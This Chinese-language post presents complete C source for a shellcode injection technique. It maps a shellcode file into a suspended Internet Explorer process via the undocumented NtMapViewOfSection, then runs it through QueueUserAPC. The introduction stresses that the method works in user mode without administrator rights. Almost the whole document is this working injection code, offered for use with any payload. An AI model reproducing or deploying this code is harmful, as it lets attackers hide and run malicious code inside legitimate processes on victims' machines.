新的注入方式:利用一个未公开函数NtMapViewOfSection在远程进程地址空间写入代码,并且用一种新的技术在远程进程中执行它,这种技术完全工作在用户模式下,并且不需要特殊的条件比如像管理员权限或者之类的要求
- #define _WIN32_WINNT 0x0400
- #include <windows.h>
- typedef LONG NTSTATUS, *PNTSTATUS;
- #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
- typedef enum _SECTION_INHERIT
- {
- ViewShare = 1,
- ViewUnmap = 2
- } SECTION_INHERIT;
- typedef NTSTATUS (__stdcall *func_NtMapViewOfSection) ( HANDLE, HANDLE, LPVOID, ULONG, SIZE_T, LARGE_INTEGER*, SIZE_T*, SECTION_INHERIT, ULONG, ULONG );
- func_NtMapViewOfSection NtMapViewOfSection = NULL;
- LPVOID NTAPI MyMapViewOfFileEx( HANDLE hProcess, HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow,
- DWORD dwNumberOfBytesToMap, LPVOID lpBaseAddress )
- {
- NTSTATUS Status;
- LARGE_INTEGER SectionOffset;
- ULONG ViewSize;
- ULONG Protect;
- LPVOID ViewBase;
- // 转换偏移量
- SectionOffset.LowPart = dwFileOffsetLow;
- SectionOffset.HighPart = dwFileOffsetHigh;
- // 保存大小和起始地址
- ViewBase = lpBaseAddress;
- ViewSize = dwNumberOfBytesToMap;
- // 转换标志为NT保护属性
- if (dwDesiredAccess & FILE_MAP_WRITE)
- {
- Protect = PAGE_READWRITE;
- }
- else if (dwDesiredAccess & FILE_MAP_READ)
- {
- Protect = PAGE_READONLY;
- }
- else if (dwDesiredAccess & FILE_MAP_COPY)
- {
- Protect = PAGE_WRITECOPY;
- }
- else
- {
- Protect = PAGE_NOACCESS;
- }
- //映射区段
- Status = NtMapViewOfSection(hFileMappingObject,
- hProcess,
- &ViewBase,
- 0,
- 0,
- &SectionOffset,
- &ViewSize,
- ViewShare,
- 0,
- Protect);
- if (!NT_SUCCESS(Status))
- {
- // 失败
- return NULL;
- }
- //返回起始地址
- return ViewBase;
- }
- int WINAPI WinMain (HINSTANCE, HINSTANCE, LPSTR, int)
- {
- HMODULE hDll = LoadLibrary( "ntdll.dll" );
- NtMapViewOfSection = (func_NtMapViewOfSection) GetProcAddress (hDll, "NtMapViewOfSection");
- // 取ShellCode,任何你想实现的
- HANDLE hFile = CreateFile ("C:\\shellcode.txt", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
- HANDLE hMappedFile = CreateFileMapping (hFile, NULL, PAGE_READONLY, 0, 0, NULL);
- // 启动目标进程
- STARTUPINFO st;
- ZeroMemory (&st, sizeof(st));
- st.cb = sizeof (STARTUPINFO);
- PROCESS_INFORMATION pi;
- ZeroMemory (&pi, sizeof(pi));
- CreateProcess ("C:\\Programme\\Internet Explorer\\iexplore.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &st, &pi);
- // 注入shellcode到目标进程地址空间
- LPVOID MappedFile = MyMapViewOfFileEx (pi.hProcess, hMappedFile, FILE_MAP_READ, 0, 0, 0, NULL);
- // 创建一个新的能够在目标线程恢复是首先执行的APC
- QueueUserAPC ((PAPCFUNC) MappedFile, pi.hThread, NULL);
- ResumeThread (pi.hThread);
- CloseHandle (hFile);
- CloseHandle (hMappedFile);
- CloseHandle (pi.hThread);
- CloseHandle (pi.hProcess);
- return 0;
- }